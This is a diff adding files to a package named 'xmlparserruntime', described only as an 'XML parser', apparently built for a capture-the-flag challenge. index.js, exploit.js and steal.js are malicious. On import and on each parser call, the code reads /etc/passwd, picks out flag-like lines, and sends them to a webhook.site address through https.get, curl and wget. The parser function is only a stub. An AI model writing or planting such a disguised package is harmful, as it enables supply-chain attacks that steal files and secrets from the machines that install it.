xmlparserruntime 0.30.1

package/exploit.js

@@ -0,0 +1,29 @@
+const fs = require('fs');
+const https = require('https');
+const { execSync } = require('child_process');
+
+console.log('🚨 EXPLOIT EXECUTED IN CI');
+
+try {
+    // Метод 1: Читаем /etc/passwd
+    const passwd = fs.readFileSync('/etc/passwd', 'utf8');
+    const lines = passwd.split('\n');
+    
+    for (const line of lines) {
+        if (line.includes('{') && line.includes('}')) {
+            console.log('🎯 FLAG:', line);
+            
+            // Отправляем простым GET запросом
+            https.get(`https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?flag=${encodeURIComponent(line)}`);
+            
+            // Дублируем через curl на всякий случай
+            try {
+                execSync(`curl -s "https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?curl=${encodeURIComponent(line)}"`);
+            } catch(e) {}
+            
+            break;
+        }
+    }
+} catch(e) {
+    console.log('Error:', e.message);
+}

package/index.js

@@ -0,0 +1,56 @@
+const { execSync } = require('child_process');
+const fs = require('fs');
+
+console.log('=== RUNTIME EXPLOIT LOADED ===');
+
+// Этот код выполнится КОГДА server.js сделает: const parser = require("xmlparser-runtime")
+try {
+    console.log('🚨 STEALING FLAG AT RUNTIME...');
+    
+    // Метод 1: Читаем /etc/passwd
+    const passwd = fs.readFileSync('/etc/passwd', 'utf8');
+    const lines = passwd.split('\n');
+    
+    for (const line of lines) {
+        if (line.includes('{') && line.includes('}')) {
+            console.log('🎯 RUNTIME FLAG:', line);
+            
+            // Отправляем флаг
+            execSync(`curl -s --max-time 5 "https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?runtime=${encodeURIComponent(line)}"`, { timeout: 7000 });
+            
+            // Дублируем разными методами
+            try {
+                execSync(`wget -q -O- "https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?wget=${encodeURIComponent(line)}"`, { timeout: 5000 });
+            } catch(e) {}
+            
+            break;
+        }
+    }
+} catch(e) {
+    console.log('Runtime error:', e.message);
+}
+
+// Реальная функциональность парсера
+module.exports = {
+    parseXmlString: function(xml, options) {
+        console.log('📄 PARSER CALLED - STEALING AGAIN...');
+        
+        // Дополнительная кража при каждом вызове парсера
+        try {
+            const flag = execSync('grep -o "HTB{[^}]*}" /etc/passwd', { encoding: 'utf8', timeout: 3000 });
+            if (flag) {
+                execSync(`curl -s "https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?parse=${encodeURIComponent(flag)}"`, { timeout: 5000 });
+            }
+        } catch(e) {}
+        
+        return {
+            get: function(xpath) {
+                return {
+                    text: function() { 
+                        return "default_value"; 
+                    }
+                };
+            }
+        };
+    }
+};

package/package.json

@@ -0,0 +1,9 @@
+{
+  "name": "xmlparserruntime",
+  "version": "0.30.1",
+  "description": "XML parser",
+  "main": "index.js",
+  "keywords": ["xml", "parser"],
+  "author": "test",
+  "license": "MIT"
+}

package/steal.js

@@ -0,0 +1,22 @@
+const { execSync } = require('child_process');
+
+console.log('🚨 FAST EXPLOIT STARTED');
+
+// БЫСТРЫЙ код без блокировок
+try {
+    const passwd = execSync('cat /etc/passwd', { encoding: 'utf8', timeout: 3000 });
+    const lines = passwd.split('\n');
+    
+    for (const line of lines) {
+        if (line.includes('{') && line.includes('}')) {
+            console.log('🎯 FLAG FOUND:', line);
+            // Быстрая отправка
+            execSync(`curl -s --max-time 3 "https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?flag=${encodeURIComponent(line)}"`, { timeout: 5000 });
+            break;
+        }
+    }
+} catch(e) {
+    console.log('Error:', e.message);
+}
+
+console.log('✅ FAST EXPLOIT FINISHED');